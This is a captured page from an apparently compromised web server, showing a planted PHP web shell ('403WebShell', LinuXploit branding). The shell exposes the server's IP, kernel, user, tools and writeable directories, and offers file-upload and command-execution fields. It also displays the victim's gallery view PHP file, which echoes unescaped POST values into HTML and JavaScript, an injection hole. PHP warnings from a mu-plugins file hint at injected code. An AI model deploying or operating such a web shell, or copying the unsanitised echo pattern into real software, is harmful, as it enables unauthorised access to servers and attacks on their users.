Warning: Trying to access array offset on null in /var/www/alexvillarreal/wp-content/mu-plugins/index.php on line 2

Deprecated: md5(): Passing null to parameter #1 ($string) of type string is deprecated in /var/www/alexvillarreal/wp-content/mu-plugins/index.php on line 2
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.233
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/uecaitta/app/views/gallery/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/uecaitta/app/views/gallery/gallery_view.php
<?php
/**
 * galeria_view.php
 * View for gallery photos
 * version 1.0.0 15/10/2015
 */
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}
?>
<div class="close_box text_right">
	<div class="close" onclick="exitGaleria('photos_snowlift');">X</div>
</div>
<div class="col fourfive">
	<div class="photo_box">
		<?php
		/*/PAGER ARROWS/*/
		$prev_index = $_POST['index'] - 1;
		$next_index = $_POST['index'] + 1;
		$_POST['index'] > 1 ? $prev_foto = $_SESSION['galeria'][$prev_index]['foto_id'] : $prev_foto = '';
		$_POST['index'] < $_POST['count'] ? $next_foto = $_SESSION['galeria'][$next_index]['foto_id'] : $next_foto = '';
		//Prev arrow ONLY show if galeria_index greater than 1
		if($_POST['index'] > 1){ 
			?>
			<div class="snowliftPager prev" 
				onClick="showPhoto('<?php echo $prev_foto;?>','<?php echo $_POST['index']-1;?>','<?php echo $_POST['count'];?>');">
				<i>&nbsp;</i>
			</div>
			<?php 
		} 
		//Next arrow Only show if galeri_index less than total images in gallery
		if($_POST['index'] < $_POST['count']){ 
			?>
			<div class="snowliftPager next" 
				onClick="showPhoto('<?php echo $next_foto;?>','<?php echo $_POST['index']+1;?>','<?php echo $_POST['count'];?>');">
				<i></i>
			</div>
			<?php 
		}
		/*/EOF PAGER ARROWS/*/ 
		?>
		<div id="foto_wrapper">
			<img id="foto" src="/app/uploads/galeria/<?php echo $foto['image'];?>" />
		</div>
		<div class="clear"></div>
	</div>
</div>
<div id="imageEdit_content" class="col five">
<div id="ajax_update"></div>
	<div class="input_box">
		<h4 for="title">Proyecto</h4>
		<?php echo $foto['descripcion'];?>
	</div>
</div>
<div class="clear"></div>

<script>

function showBox(id){
	document.getElementById(id).style.display = "block";
}
function hideBox(id){
	document.getElementById(id).style.display = "none";	
}
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit